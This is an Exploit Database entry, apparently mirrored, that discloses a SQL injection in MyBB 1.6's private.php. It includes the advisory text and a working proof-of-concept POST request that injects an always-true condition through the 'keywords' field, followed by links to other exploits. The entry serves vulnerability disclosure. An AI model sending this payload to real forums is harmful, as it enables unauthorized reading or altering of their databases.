MyBB 1.6 – ‘private.php?keywords’ SQL Injection

Exploit Database
13 阅读

作者： Aung Khant

日期： 2010-12-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35141/

source: https://www.securityfocus.com/bid/45565/info
 
MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
MyBB 1.6 is vulnerable; other versions may also be affected. 

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff

last Exploits
MyBB 1.6 – ‘private.php?keywords’ SQL Injection的更多信息

The Car Project 1.0 – SQL Injection：
Joomla! Component com_adds – Blind SQL Injection：
Vanilla < 2.1.5 - Cross-Site Request Forgery：
thesystem 1.0 – Cross-Site Scripting：
Joomla! Component 3D Cloud – ‘tagcloud.swf’ Cross-Site Scripting：
Drupal Module Drag & Drop Gallery 6.x-1.5 – ‘upload.php’ Arbitrary File Upload：
B-Hind CMS (tiny_mce) – Arbitrary File Upload：
Clinic Pro v4 – ‘month’ SQL Injection：